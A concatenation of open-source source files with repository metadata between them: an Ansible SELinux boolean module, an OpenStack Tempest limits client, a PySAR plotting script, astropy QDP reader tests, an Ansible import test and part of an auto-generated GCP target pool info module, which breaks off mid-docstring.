    update it, then write it back both to the local store and as the active
    value.  Every failure path destroys the handle before fail_json.
    """
    # Temporary record used only to derive the lookup key from `name`.
    rc, t_b = semanage.semanage_bool_create(handle)
    if rc < 0:
        semanage.semanage_handle_destroy(handle)
        module.fail_json(msg="Failed to create seboolean with semanage")
    if semanage.semanage_bool_set_name(handle, t_b, name) < 0:
        semanage.semanage_handle_destroy(handle)
        module.fail_json(msg="Failed to set seboolean name with semanage")
    rc, boolkey = semanage.semanage_bool_key_extract(handle, t_b)
    if rc < 0:
        semanage.semanage_handle_destroy(handle)
        module.fail_json(msg="Failed to extract boolean key with semanage")
    rc, exists = semanage.semanage_bool_exists(handle, boolkey)
    if rc < 0:
        semanage.semanage_handle_destroy(handle)
        module.fail_json(msg="Failed to check if boolean is defined")
    if not exists:
        semanage.semanage_handle_destroy(handle)
        module.fail_json(msg="SELinux boolean %s is not defined in persistent policy" % name)
    rc, sebool = semanage.semanage_bool_query(handle, boolkey)
    if rc < 0:
        semanage.semanage_handle_destroy(handle)
        module.fail_json(msg="Failed to query boolean in persistent policy")
    semanage.semanage_bool_set_value(sebool, value)
    # Persist to the local module store and make it the active value.
    if semanage.semanage_bool_modify_local(handle, boolkey, sebool) < 0:
        semanage.semanage_handle_destroy(handle)
        module.fail_json(msg="Failed to modify boolean key with semanage")
    if semanage.semanage_bool_set_active(handle, boolkey, sebool) < 0:
        semanage.semanage_handle_destroy(handle)
        module.fail_json(msg="Failed to set boolean key active with semanage")
    # Release the C-allocated records.
    semanage.semanage_bool_key_free(boolkey)
    semanage.semanage_bool_free(t_b)
    semanage.semanage_bool_free(sebool)
def semanage_get_boolean_value(module, handle, name):
    """Return the persistent-policy value (0/1) of boolean `name`.

    Mirrors semanage_set_boolean_value's key-extraction sequence but only
    reads the stored record.  Failure paths destroy the handle first.
    """
    # Temporary record used only to derive the lookup key from `name`.
    rc, t_b = semanage.semanage_bool_create(handle)
    if rc < 0:
        semanage.semanage_handle_destroy(handle)
        module.fail_json(msg="Failed to create seboolean with semanage")
    if semanage.semanage_bool_set_name(handle, t_b, name) < 0:
        semanage.semanage_handle_destroy(handle)
        module.fail_json(msg="Failed to set seboolean name with semanage")
    rc, boolkey = semanage.semanage_bool_key_extract(handle, t_b)
    if rc < 0:
        semanage.semanage_handle_destroy(handle)
        module.fail_json(msg="Failed to extract boolean key with semanage")
    rc, exists = semanage.semanage_bool_exists(handle, boolkey)
    if rc < 0:
        semanage.semanage_handle_destroy(handle)
        module.fail_json(msg="Failed to check if boolean is defined")
    if not exists:
        semanage.semanage_handle_destroy(handle)
        module.fail_json(msg="SELinux boolean %s is not defined in persistent policy" % name)
    rc, sebool = semanage.semanage_bool_query(handle, boolkey)
    if rc < 0:
        semanage.semanage_handle_destroy(handle)
        module.fail_json(msg="Failed to query boolean in persistent policy")
    value = semanage.semanage_bool_get_value(sebool)
    # Release the C-allocated records before returning.
    semanage.semanage_bool_key_free(boolkey)
    semanage.semanage_bool_free(t_b)
    semanage.semanage_bool_free(sebool)
    return value
def semanage_commit(module, handle, load=0):
    """Commit the open semanage transaction; `load` controls policy reload."""
    semanage.semanage_set_reload(handle, load)
    if semanage.semanage_commit(handle) < 0:
        semanage.semanage_handle_destroy(handle)
        module.fail_json(msg="Failed to commit changes to semanage")
def semanage_destroy_handle(module, handle):
    """Disconnect and destroy a semanage handle, failing on disconnect error."""
    rc = semanage.semanage_disconnect(handle)
    # Destroy unconditionally so the handle never leaks, then report errors.
    semanage.semanage_handle_destroy(handle)
    if rc < 0:
        module.fail_json(msg="Failed to disconnect from semanage")
# This mirrors what setsebool.c does to change a boolean and make the
# change persist across reboots.
def semanage_boolean_value(module, name, state):
    """Persistently set boolean `name`; return True if the value changed."""
    target = 1 if state else 0
    changed = False
    try:
        handle = semanage_get_handle(module)
        semanage_begin_transaction(module, handle)
        current = semanage_get_boolean_value(module, handle, name)
        if current != target:
            changed = True
            if not module.check_mode:
                semanage_set_boolean_value(module, handle, name, target)
                semanage_commit(module, handle)
        semanage_destroy_handle(module, handle)
    except Exception as e:
        # Boundary handler: translate any semanage failure into module output.
        module.fail_json(msg=u"Failed to manage policy for boolean %s: %s" % (name, to_text(e)))
    return changed
def set_boolean_value(module, name, state):
    """Set the runtime value of boolean `name`; return True on success."""
    rc = 0
    value = 1 if state else 0
    try:
        rc = selinux.security_set_boolean(name, value)
    except OSError:
        module.fail_json(msg="Failed to set boolean %s to %s" % (name, value))
    return rc == 0
def main():
    """Ansible entry point: toggle an SELinux boolean (runtime or persistent)."""
    module = AnsibleModule(
        argument_spec=dict(
            ignore_selinux_state=dict(type='bool', default=False),
            name=dict(type='str', required=True),
            persistent=dict(type='bool', default=False),
            state=dict(type='bool', required=True),
        ),
        supports_check_mode=True,
    )

    # Both python bindings are required; report which one is missing.
    if not HAVE_SELINUX:
        module.fail_json(msg=missing_required_lib('libselinux-python'), exception=SELINUX_IMP_ERR)

    if not HAVE_SEMANAGE:
        module.fail_json(msg=missing_required_lib('libsemanage-python'), exception=SEMANAGE_IMP_ERR)

    ignore_selinux_state = module.params['ignore_selinux_state']

    if not get_runtime_status(ignore_selinux_state):
        module.fail_json(msg="SELinux is disabled on this host.")

    name = module.params['name']
    persistent = module.params['persistent']
    state = module.params['state']

    result = dict(
        name=name,
        persistent=persistent,
        state=state
    )
    changed = False

    if hasattr(selinux, 'selinux_boolean_sub'):
        # selinux_boolean_sub allows sites to rename a boolean and alias the old name
        # Feature only available in selinux library since 2012.
        name = selinux.selinux_boolean_sub(name)

    if not has_boolean_value(module, name):
        module.fail_json(msg="SELinux boolean %s does not exist." % name)

    if persistent:
        changed = semanage_boolean_value(module, name, state)
    else:
        # Runtime-only change: set the active value and commit it.
        cur_value = get_boolean_value(module, name)
        if cur_value != state:
            changed = True
            if not module.check_mode:
                changed = set_boolean_value(module, name, state)
                if not changed:
                    module.fail_json(msg="Failed to set boolean %s to %s" % (name, state))
                try:
                    selinux.security_commit_booleans()
                except Exception:
                    module.fail_json(msg="Failed to commit pending boolean %s value" % name)

    result['changed'] = changed
    module.exit_json(**result)


if __name__ == '__main__':
    main()
| gpl-3.0 |
pandeyop/tempest | tempest/services/compute/json/limits_client.py | 6 | 1039 | # Copyright 2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import json
from tempest.api_schema.response.compute.v2_1 import limits as schema
from tempest.common import service_client
class LimitsClient(service_client.ServiceClient):
    """Client for the Nova v2.1 ``/limits`` API endpoint."""

    def show_limits(self):
        """GET the absolute/rate limits and return them as a ResponseBody."""
        resp, body = self.get("limits")
        body = json.loads(body)
        # Validate the payload against the published v2.1 response schema.
        self.validate_response(schema.get_limit, resp, body)
        return service_client.ResponseBody(resp, body['limits'])
| apache-2.0 |
mohseniaref/PySAR-1 | pysar/plot.py | 1 | 6588 | #! /usr/bin/env python
############################################################
# Program is part of PySAR v1.0 #
# Copyright(c) 2013, Heresh Fattahi #
# Author: Heresh Fattahi #
############################################################
#from matplotlib import colors
import getopt
import numpy as np
import h5py
import _readfile as readfile
import _pysar_utilities as ut
from mpl_toolkits.basemap import Basemap
import matplotlib.pyplot as plt
import sys
import os
from matplotlib.colors import LinearSegmentedColormap
def Usage():
    """Print command-line usage for plot.py (Python 2 print statement)."""
    print '''
    plotting the geocoded PySAR product

    plot.py -f velocity.h5 -d dem -m min -M max -x subset -y subst -o outName -i inverse colormap display (yes or no) -c colomap
    -x : 'xmin:xmax'
    -y : 'ymin:ymax'
    -c : all colormaps in matplotlib is supported (see http://matplotlib.org/examples/pylab_examples/show_colormaps.html)
    Examples:
    plot.py -f geo_velocity.h5 -d Sonoran.dem -m -0.01 -M 0.01 -i yes -o plotVelocity.png -c pysar_hsv
    '''
def main(argv):
    """Plot a geocoded PySAR HDF5 product over a shaded-relief DEM.

    Parses getopt-style flags (see Usage), reads the first dataset of the
    HDF5 file, builds a cylindrical Basemap from the file's geo attributes,
    underlays a hillshaded DEM and saves the figure.  Python 2 code.
    """
    color_map='jet'
    disp_opposite='no'
    try:
        opts, args = getopt.getopt(argv,"h:f:d:o:x:y:m:M:i:c:")
    except getopt.GetoptError:
        Usage() ; sys.exit(1)
    if opts==[]:
        Usage() ; sys.exit(1)
    for opt,arg in opts:
        if opt in ("-h","--help"):
            Usage()
            sys.exit()
        elif opt == '-f':
            File = arg
        elif opt == '-d':
            demFile=arg
        elif opt=='-m':
            Vmin=float(arg)
        elif opt=='-M':
            Vmax=float(arg)
        elif opt == '-x':
            winx=arg.split(':')
        elif opt == '-y':
            winy = arg.split(':')
        elif opt == '-o':
            outName = arg
        elif opt == '-i':
            disp_opposite = arg
        elif opt == '-c':
            color_map=arg

    h5file=h5py.File(File,'r')
    k=h5file.keys()
    print k[0]
#    ccmap=plt.get_cmap(color_map)

    ################################################
    # Custom blue-red colormap used when -c pysar_hsv is requested.
    cdict1 = {'red': ((0.0, 0.0, 0.0),
                      (0.5, 0.0, 0.0),
                      (0.6, 1.0, 1.0),
                      (0.8, 1.0, 1.0),
                      (1.0, 0.5, 0.5)),
              'green': ((0.0, 0.0, 0.0),
                        (0.2, 0.0, 0.0),
                        (0.4, 1.0, 1.0),
                        (0.6, 1.0, 1.0),
                        (0.8, 0.0, 0.0),
                        (1.0, 0.0, 0.0)),
              'blue': ((0.0, 0.5, .5),
                       (0.2, 1.0, 1.0),
                       (0.4, 1.0, 1.0),
                       (0.5, 0.0, 0.0),
                       (1.0, 0.0, 0.0),)
              }

    if color_map =='pysar_hsv':
        ccmap = LinearSegmentedColormap('BlueRed1', cdict1)
    else:
        ccmap=plt.get_cmap(color_map)
    print 'colormap is : '+ color_map

    ################################################
    # Read the whole first dataset (dataset name matches the group name).
    dset = h5file[k[0]].get(k[0])
    data=dset[0:dset.shape[0],0:dset.shape[1]]
    if disp_opposite in('yes','Yes','Y','y','YES'):
        data=-1*data

    try:
        xref=h5file[k[0]].attrs['ref_x']
        yref=h5file[k[0]].attrs['ref_y']
    except:
        print 'No reference point'

    # Geo attributes: upper-left corner plus pixel steps give the map bounds.
    try:
        ullon=float(h5file[k[0]].attrs['X_FIRST'])
        ullat=float(h5file[k[0]].attrs['Y_FIRST'])
        lon_step=float(h5file[k[0]].attrs['X_STEP'])
        lat_step=float(h5file[k[0]].attrs['Y_STEP'])
        lon_unit=h5file[k[0]].attrs['Y_UNIT']
        lat_unit=h5file[k[0]].attrs['X_UNIT']
        llcrnrlon=ullon
        llcrnrlat=ullat+lat_step*data.shape[0]
        urcrnrlon=ullon+lon_step*data.shape[1]
        urcrnrlat=ullat
        geocoord='yes'
        print 'Input file is Geocoded'
    except:
        geocoord='no'

    # NOTE(review): this figure/Basemap pair is created again below before
    # any drawing happens, so this first one appears redundant — confirm.
    fig = plt.figure()
    ax = fig.add_axes([0.1,0.1,0.8,0.8])
    m = Basemap(llcrnrlon=llcrnrlon, llcrnrlat=llcrnrlat, urcrnrlon=urcrnrlon, urcrnrlat=urcrnrlat,
                resolution='l', area_thresh=1., projection='cyl',suppress_ticks=False,ax=ax)

    print demFile
    demFile
    if os.path.basename(demFile).split('.')[1]=='hgt':
        amp,dem,demRsc = readfile.read_float32(demFile)
    elif os.path.basename(demFile).split('.')[1]=='dem':
        dem,demRsc = readfile.read_dem(demFile)

    #################################################################
    # Optional x-subset.
    # NOTE(review): `win_x` is undefined (the option is stored in `winx`,
    # already split on ':'), so this block always raises NameError and the
    # bare except silently skips the subset — likely a latent bug.
    try:
        winx
        wx=[int(i) for i in win_x.split()]
        dem=dem[:,wx[0]:wx[1]]
        data=data[:,wx[0]:wx[1]]
        ullon=float(h5file[k[0]].attrs['X_FIRST'])+wx[0]
        llcrnrlon=ullon
        urcrnrlon=ullon+lon_step*data.shape[1]
    except:
        print ''
    # Optional y-subset.
    # NOTE(review): `winy` is a list from split(':'), but .split() is called
    # on it — same silent-failure pattern as the x-subset above.
    try:
        winy
        wy=[int(i) for i in winy.split()]
        dem=dem[wy[0]:wy[1],:]
        data=data[wy[0]:wy[1],:]
    except:
        print ''

    ################################################################
    fig = plt.figure()
    ax = fig.add_axes([0.1,0.1,0.8,0.8])
    m = Basemap(llcrnrlon=llcrnrlon, llcrnrlat=llcrnrlat, urcrnrlon=urcrnrlon, urcrnrlat=urcrnrlat,
                resolution='l', area_thresh=1., projection='cyl',suppress_ticks=False,ax=ax)

    # Hillshaded DEM underlay in grayscale, data layer on top.
    cmap_dem=plt.get_cmap('gray')
    m.imshow(ut.hillshade(np.flipud(dem),50.0),cmap=cmap_dem)

    try:
        im=m.imshow(np.flipud(data),vmin=Vmin,vmax=Vmax,cmap=ccmap)
#        cb = m.colorbar(im,"right", size="5%", pad='2%')
    except:
        im=m.imshow(np.flipud(data))
#        cb = m.colorbar(im,"right", size="5%", pad='2%')
#    m.bluemarble()
#    cb = m.colorbar(im,"right", size="5%", pad='2%')
#    parallels = np.arange(31.,34,0.5)
#    m.drawparallels(parallels,labels=[1,0,0,1],linewidth=0.0)
#    meridians = np.arange(-115.,-112.,0.5)
#    m.drawmeridians(meridians,labels=[1,0,0,1],linewidth=0.0)
#    m.drawmapscale()
#    m = Basemap(llcrnrlon=-110.,llcrnrlat=0.,urcrnrlon=-20.,urcrnrlat=57.,
#            projection='lcc',lat_1=20.,lat_2=40.,lon_0=-60.,
#            resolution ='l',area_thresh=1000.)
#    m.drawcoastlines()
#    m.drawcountries()
#    m.drawmapboundary(fill_color='#99ffff')
#    m.fillcontinents(color='#cc9966',lake_color='#99ffff')
#    m.drawparallels(np.arange(10,70,20),labels=[1,1,0,0])
#    m.drawmeridians(np.arange(-100,0,20),labels=[0,0,0,1])
#    plt.title('Atlantic Hurricane Tracks (Storms Reaching Category 4, 1851-2004)')

    # Default output name is derived from the input file when -o is absent.
    try:
        figName = outName
    except:
        outName=os.path.basename(File).replace('.h5','')
        figName = outName + '.png'
    plt.savefig(figName,pad_inches=0.0)
#    plt.show()

    h5file.close()


if __name__ == '__main__':
    main(sys.argv[1:])
| mit |
astropy/astropy | astropy/io/ascii/tests/test_qdp.py | 5 | 9090 | import numpy as np
import pytest
from astropy.io import ascii
from astropy.io.ascii.qdp import _read_table_qdp, _write_table_qdp
from astropy.io.ascii.qdp import _get_lines_from_file
from astropy.table import Table, Column, MaskedColumn
from astropy.utils.exceptions import AstropyUserWarning
def test_get_tables_from_qdp_file(tmpdir):
    """A multi-table QDP file can be read table-by-table via ``table_id``."""
    example_qdp = """
    ! Swift/XRT hardness ratio of trigger: XXXX, name: BUBU X-2
    ! Columns are as labelled
    READ TERR 1
    READ SERR 2
    ! WT -- hard data
    !MJD Err (pos) Err(neg) Rate Error
    53000.123456 2.37847222222222e-05 -2.37847222222222e-05 -0.212439 0.212439
    55045.099887 1.14467592592593e-05 -1.14467592592593e-05 0.000000 0.000000
    NO NO NO NO NO
    ! WT -- soft data
    !MJD Err (pos) Err(neg) Rate Error
    53000.123456 2.37847222222222e-05 -2.37847222222222e-05 0.726155 0.583890
    55045.099887 1.14467592592593e-05 -1.14467592592593e-05 2.410935 1.393592
    NO NO NO NO NO
    ! WT -- hardness ratio
    !MJD Err (pos) Err(neg) Rate Error
    53000.123456 2.37847222222222e-05 -2.37847222222222e-05 -0.292553 -0.374935
    55045.099887 1.14467592592593e-05 -1.14467592592593e-05 0.000000 -nan
    """
    path = str(tmpdir.join('test.qdp'))

    with open(path, "w") as fp:
        print(example_qdp, file=fp)

    # Each table keeps the file-level comments plus its own block comment.
    table0 = _read_table_qdp(fp.name, names=["MJD", "Rate"], table_id=0)
    assert table0.meta["initial_comments"][0].startswith("Swift")
    assert table0.meta["comments"][0].startswith("WT -- hard data")
    table2 = _read_table_qdp(fp.name, names=["MJD", "Rate"], table_id=2)
    assert table2.meta["initial_comments"][0].startswith("Swift")
    assert table2.meta["comments"][0].startswith("WT -- hardness")
    # TERR columns produce separate positive/negative error columns.
    assert np.isclose(table2["MJD_nerr"][0], -2.37847222222222e-05)
def test_roundtrip(tmpdir):
    """Write a parsed QDP table back out; masks, NaNs and values survive."""
    example_qdp = """
    ! Swift/XRT hardness ratio of trigger: XXXX, name: BUBU X-2
    ! Columns are as labelled
    READ TERR 1
    READ SERR 2
    ! WT -- hard data
    !MJD Err (pos) Err(neg) Rate Error
    53000.123456 2.37847222222222e-05 -2.37847222222222e-05 NO 0.212439
    55045.099887 1.14467592592593e-05 -1.14467592592593e-05 0.000000 0.000000
    NO NO NO NO NO
    ! WT -- soft data
    !MJD Err (pos) Err(neg) Rate Error
    53000.123456 2.37847222222222e-05 -2.37847222222222e-05 0.726155 0.583890
    55045.099887 1.14467592592593e-05 -1.14467592592593e-05 2.410935 1.393592
    NO NO NO NO NO
    ! WT -- hardness ratio
    !MJD Err (pos) Err(neg) Rate Error
    53000.123456 2.37847222222222e-05 -2.37847222222222e-05 -0.292553 -0.374935
    55045.099887 1.14467592592593e-05 -1.14467592592593e-05 0.000000 NO
    ! Add command, just to raise the warning.
    READ TERR 1
    ! WT -- whatever
    !MJD Err (pos) Err(neg) Rate Error
    53000.123456 2.37847222222222e-05 -2.37847222222222e-05 -0.292553 -0.374935
    NO 1.14467592592593e-05 -1.14467592592593e-05 0.000000 NO
    """
    path = str(tmpdir.join('test.qdp'))
    path2 = str(tmpdir.join('test2.qdp'))

    with open(path, "w") as fp:
        print(example_qdp, file=fp)
    # The duplicated READ command block must trigger a warning.
    with pytest.warns(AstropyUserWarning) as record:
        table = _read_table_qdp(path, names=["MJD", "Rate"],
                                table_id=0)
    assert np.any(["This file contains multiple command blocks"
                   in r.message.args[0]
                   for r in record])

    _write_table_qdp(table, path2)

    new_table = _read_table_qdp(path2, names=["MJD", "Rate"], table_id=0)

    for col in new_table.colnames:
        # "NO" entries round-trip as masked values...
        is_masked = np.array([np.ma.is_masked(val) for val in new_table[col]])
        if np.any(is_masked):
            # All NaN values are read as such.
            assert np.ma.is_masked(table[col][is_masked])

        # ...while literal NaNs round-trip as NaNs.
        is_nan = np.array([(not np.ma.is_masked(val) and np.isnan(val))
                           for val in new_table[col]])
        # All non-NaN values are the same
        assert np.allclose(new_table[col][~is_nan], table[col][~is_nan])
        if np.any(is_nan):
            # All NaN values are read as such.
            assert np.isnan(table[col][is_nan])

    assert np.allclose(new_table['MJD_perr'], [2.378472e-05, 1.1446759e-05])

    for meta_name in ['initial_comments', 'comments']:
        assert meta_name in new_table.meta
def test_read_example(tmpdir):
    """The ascii.qdp reader works both via ascii.read and Table.read."""
    example_qdp = """
    ! Initial comment line 1
    ! Initial comment line 2
    READ TERR 1
    READ SERR 3
    ! Table 0 comment
    !a a(pos) a(neg) b c ce d
    53000.5   0.25  -0.5   1  1.5  3.5 2
    54000.5   1.25  -1.5   2  2.5  4.5 3
    NO NO NO NO NO
    ! Table 1 comment
    !a a(pos) a(neg) b c ce d
    54000.5   2.25  -2.5   NO  3.5  5.5 5
    55000.5   3.25  -3.5   4  4.5  6.5 nan
    """
    dat = ascii.read(example_qdp, format='qdp', table_id=1,
                     names=['a', 'b', 'c', 'd'])
    t = Table.read(example_qdp, format='ascii.qdp', table_id=1,
                   names=['a', 'b', 'c', 'd'])
    assert np.allclose(t['a'], [54000, 55000])
    assert t['c_err'][0] == 5.5
    # "NO" becomes a masked entry; "nan" becomes an actual NaN.
    assert np.ma.is_masked(t['b'][0])
    assert np.isnan(t['d'][1])

    # Both entry points must yield identical columns.
    for col1, col2 in zip(t.itercols(), dat.itercols()):
        assert np.allclose(col1, col2, equal_nan=True)
def test_roundtrip_example(tmpdir):
    """Writing with explicit err_specs and re-reading preserves all columns."""
    example_qdp = """
    ! Initial comment line 1
    ! Initial comment line 2
    READ TERR 1
    READ SERR 3
    ! Table 0 comment
    !a a(pos) a(neg) b c ce d
    53000.5   0.25  -0.5   1  1.5  3.5 2
    54000.5   1.25  -1.5   2  2.5  4.5 3
    NO NO NO NO NO
    ! Table 1 comment
    !a a(pos) a(neg) b c ce d
    54000.5   2.25  -2.5   NO  3.5  5.5 5
    55000.5   3.25  -3.5   4  4.5  6.5 nan
    """
    test_file = str(tmpdir.join('test.qdp'))

    t = Table.read(example_qdp, format='ascii.qdp', table_id=1,
                   names=['a', 'b', 'c', 'd'])
    # Column 1 carries two-sided (TERR) errors, column 3 symmetric (SERR).
    t.write(test_file, err_specs={'terr': [1], 'serr': [3]})
    t2 = Table.read(test_file, names=['a', 'b', 'c', 'd'], table_id=0)

    for col1, col2 in zip(t.itercols(), t2.itercols()):
        assert np.allclose(col1, col2, equal_nan=True)
def test_roundtrip_example_comma(tmpdir):
    """Comma-separated QDP input parses with sep=',' and round-trips."""
    example_qdp = """
    ! Initial comment line 1
    ! Initial comment line 2
    READ TERR 1
    READ SERR 3
    ! Table 0 comment
    !a,a(pos),a(neg),b,c,ce,d
    53000.5,0.25,-0.5,1,1.5,3.5,2
    54000.5,1.25,-1.5,2,2.5,4.5,3
    NO,NO,NO,NO,NO
    ! Table 1 comment
    !a,a(pos),a(neg),b,c,ce,d
    54000.5,2.25,-2.5,NO,3.5,5.5,5
    55000.5,3.25,-3.5,4,4.5,6.5,nan
    """
    test_file = str(tmpdir.join('test.qdp'))

    t = Table.read(example_qdp, format='ascii.qdp', table_id=1,
                   names=['a', 'b', 'c', 'd'], sep=',')
    t.write(test_file, err_specs={'terr': [1], 'serr': [3]})
    t2 = Table.read(test_file, names=['a', 'b', 'c', 'd'], table_id=0)

    # t.values_equal(t2)
    for col1, col2 in zip(t.itercols(), t2.itercols()):
        assert np.allclose(col1, col2, equal_nan=True)
def test_read_write_simple(tmpdir):
    """Reading back without table_id warns and picks the first table."""
    test_file = str(tmpdir.join('test.qdp'))
    t1 = Table()
    t1.add_column(Column(name='a', data=[1, 2, 3, 4]))
    t1.add_column(MaskedColumn(data=[4., np.nan, 3., 1.], name='b',
                               mask=[False, False, False, True]))
    t1.write(test_file, format='ascii.qdp')
    with pytest.warns(UserWarning) as record:
        t2 = Table.read(test_file, format='ascii.qdp')
    assert np.any(["table_id not specified. Reading the first available table"
                   in r.message.args[0]
                   for r in record])

    # Without `names`, columns come back with default names col1/col2.
    assert np.allclose(t2['col1'], t1['a'])
    assert np.all(t2['col1'] == t1['a'])
    good = ~np.isnan(t1['b'])
    assert np.allclose(t2['col2'][good], t1['b'][good])
def test_read_write_simple_specify_name(tmpdir):
    """Round-trip a single-column table with an explicit column name."""
    test_file = str(tmpdir.join('test.qdp'))
    written = Table()
    written.add_column(Column(name='a', data=[1, 2, 3]))
    # Give a non-None err_specs
    written.write(test_file, format='ascii.qdp')
    loaded = Table.read(test_file, table_id=0, format='ascii.qdp',
                        names=['a'])
    assert np.all(loaded['a'] == written['a'])
def test_get_lines_from_qdp(tmpdir):
    """_get_lines_from_file must accept a string, a file path and a list."""
    test_file = str(tmpdir.join('test.qdp'))
    expected = ["A", "B"]
    text_string = "A\nB"
    text_output = _get_lines_from_file(text_string)
    with open(test_file, "w") as fobj:
        print(text_string, file=fobj)
    file_output = _get_lines_from_file(test_file)
    list_output = _get_lines_from_file(expected)
    # All three input flavours must yield identical line sequences.
    for i, line in enumerate(expected):
        for output in (file_output, list_output, text_output):
            assert output[i] == line
| bsd-3-clause |
prune998/ansible | test/integration/targets/module_utils/library/test.py | 91 | 2819 | #!/usr/bin/python
# Integration-test payload: exercise every supported way of importing code
# from ansible.module_utils (plain import, from-import of modules and of
# identifiers, nested packages, aliased imports) and report what was found.
# NOTE: the import statements ARE the test — their form and order must not
# be "cleaned up".
results = {}

# Test import with no from
import ansible.module_utils.foo0
results['foo0'] = ansible.module_utils.foo0.data

# Test depthful import with no from
import ansible.module_utils.bar0.foo
results['bar0'] = ansible.module_utils.bar0.foo.data

# Test import of module_utils/foo1.py
from ansible.module_utils import foo1
results['foo1'] = foo1.data

# Test import of an identifier inside of module_utils/foo2.py
from ansible.module_utils.foo2 import data
results['foo2'] = data

# Test import of module_utils/bar1/__init__.py
from ansible.module_utils import bar1
results['bar1'] = bar1.data

# Test import of an identifier inside of module_utils/bar2/__init__.py
from ansible.module_utils.bar2 import data
results['bar2'] = data

# Test import of module_utils/baz1/one.py
from ansible.module_utils.baz1 import one
results['baz1'] = one.data

# Test import of an identifier inside of module_utils/baz2/one.py
from ansible.module_utils.baz2.one import data
results['baz2'] = data

# Test import of module_utils/spam1/ham/eggs/__init__.py
from ansible.module_utils.spam1.ham import eggs
results['spam1'] = eggs.data

# Test import of an identifier inside module_utils/spam2/ham/eggs/__init__.py
from ansible.module_utils.spam2.ham.eggs import data
results['spam2'] = data

# Test import of module_utils/spam3/ham/bacon.py
from ansible.module_utils.spam3.ham import bacon
results['spam3'] = bacon.data

# Test import of an identifier inside of module_utils/spam4/ham/bacon.py
from ansible.module_utils.spam4.ham.bacon import data
results['spam4'] = data

# Test import of module_utils.spam5.ham bacon and eggs (modules)
from ansible.module_utils.spam5.ham import bacon, eggs
results['spam5'] = (bacon.data, eggs.data)

# Test import of module_utils.spam6.ham bacon and eggs (identifiers)
from ansible.module_utils.spam6.ham import bacon, eggs
results['spam6'] = (bacon, eggs)

# Test import of module_utils.spam7.ham bacon and eggs (module and identifier)
from ansible.module_utils.spam7.ham import bacon, eggs
results['spam7'] = (bacon.data, eggs)

# Test import of module_utils/spam8/ham/bacon.py and module_utils/spam8/ham/eggs.py separately
from ansible.module_utils.spam8.ham import bacon
from ansible.module_utils.spam8.ham import eggs
results['spam8'] = (bacon.data, eggs)

# Test that import of module_utils/qux1/quux.py using as works
from ansible.module_utils.qux1 import quux as one
results['qux1'] = one.data

# Test that importing qux2/quux.py and qux2/quuz.py using as works
from ansible.module_utils.qux2 import quux as one, quuz as two
results['qux2'] = (one.data, two.data)

# Test depth
from ansible.module_utils.a.b.c.d.e.f.g.h import data
results['abcdefgh'] = data

# Hand the collected values back to the test harness as module output.
from ansible.module_utils.basic import AnsibleModule
AnsibleModule(argument_spec=dict()).exit_json(**results)
| gpl-3.0 |
aperigault/ansible | lib/ansible/modules/cloud/google/gcp_compute_target_pool_info.py | 2 | 8870 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2017 Google
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# ----------------------------------------------------------------------------
#
# *** AUTO GENERATED CODE *** AUTO GENERATED CODE ***
#
# ----------------------------------------------------------------------------
#
# This file is automatically generated by Magic Modules and manual
# changes will be clobbered when the file is regenerated.
#
# Please read more about how to change this file at
# https://www.github.com/GoogleCloudPlatform/magic-modules
#
# ----------------------------------------------------------------------------
from __future__ import absolute_import, division, print_function
__metaclass__ = type
################################################################################
# Documentation
################################################################################
ANSIBLE_METADATA = {'metadata_version': '1.1', 'status': ["preview"], 'supported_by': 'community'}
DOCUMENTATION = '''
---
module: gcp_compute_target_pool_info
description:
- Gather info for GCP TargetPool
- This module was called C(gcp_compute_target_pool_facts) before Ansible 2.9. The
usage has not changed.
short_description: Gather info for GCP TargetPool
version_added: 2.7
author: Google Inc. (@googlecloudplatform)
requirements:
- python >= 2.6
- requests >= 2.18.4
- google-auth >= 1.3.0
options:
filters:
description:
- A list of filter value pairs. Available filters are listed here U(https://cloud.google.com/sdk/gcloud/reference/topic/filters).
- Each additional filter in the list will act be added as an AND condition (filter1
and filter2) .
type: list
region:
description:
- The region where the target pool resides.
required: true
type: str
extends_documentation_fragment: gcp
'''
EXAMPLES = '''
- name: get info on a target pool
gcp_compute_target_pool_info:
region: us-west1
filters:
- name = test_object
project: test_project
auth_kind: serviceaccount
service_account_file: "/tmp/auth.pem"
'''
RETURN = '''
resources:
description: List of resources
returned: always
type: complex
contains:
backupPool:
description:
- This field is applicable only when the containing target pool is serving a
forwarding rule as the primary pool, and its failoverRatio field is properly
set to a value between [0, 1].
- 'backupPool and failoverRatio together define the fallback behavior of the
primary target pool: if the ratio of the healthy instances in the primary
pool is at or below failoverRatio, traffic arriving at the load-balanced IP
will be directed to the backup pool.'
- In case where failoverRatio and backupPool are not set, or all the instances
in the backup pool are unhealthy, the traffic will be directed back to the
primary pool in the "force" mode, where traffic will be spread to the healthy
instances with the best effort, or to all instances when no instance is healthy.
returned: success
type: dict
creationTimestamp:
description:
- Creation timestamp in RFC3339 text format.
returned: success
type: str
description:
description:
- An optional description of this resource.
returned: success
type: str
failoverRatio:
description:
- This field is applicable only when the containing target pool is serving a
forwarding rule as the primary pool (i.e., not as a backup pool to some other
target pool). The value of the field must be in [0, 1].
- 'If set, backupPool must also be set. They together define the fallback behavior
of the primary target pool: if the ratio of the healthy instances in the primary
pool is at or below this number, traffic arriving at the load-balanced IP
will be directed to the backup pool.'
- In case where failoverRatio is not set or all the instances in the backup
pool are unhealthy, the traffic will be directed back to the primary pool
in the "force" mode, where traffic will be spread to the healthy instances
with the best effort, or to all instances when no instance is healthy.
returned: success
type: str
healthCheck:
description:
- A reference to a HttpHealthCheck resource.
- A member instance in this pool is considered healthy if and only if the health
checks pass. If not specified it means all member instances will be considered
healthy at all times.
returned: success
type: dict
id:
description:
- The unique identifier for the resource.
returned: success
type: int
instances:
description:
- A list of virtual machine instances serving this pool.
- They must live in zones contained in the same region as this pool.
returned: success
type: list
name:
description:
- Name of the resource. Provided by the client when the resource is created.
The name must be 1-63 characters long, and comply with RFC1035. Specifically,
the name must be 1-63 characters long and match the regular expression `[a-z]([-a-z0-9]*[a-z0-9])?`
which means the first character must be a lowercase letter, and all following
characters must be a dash, lowercase letter, or digit, except the last character,
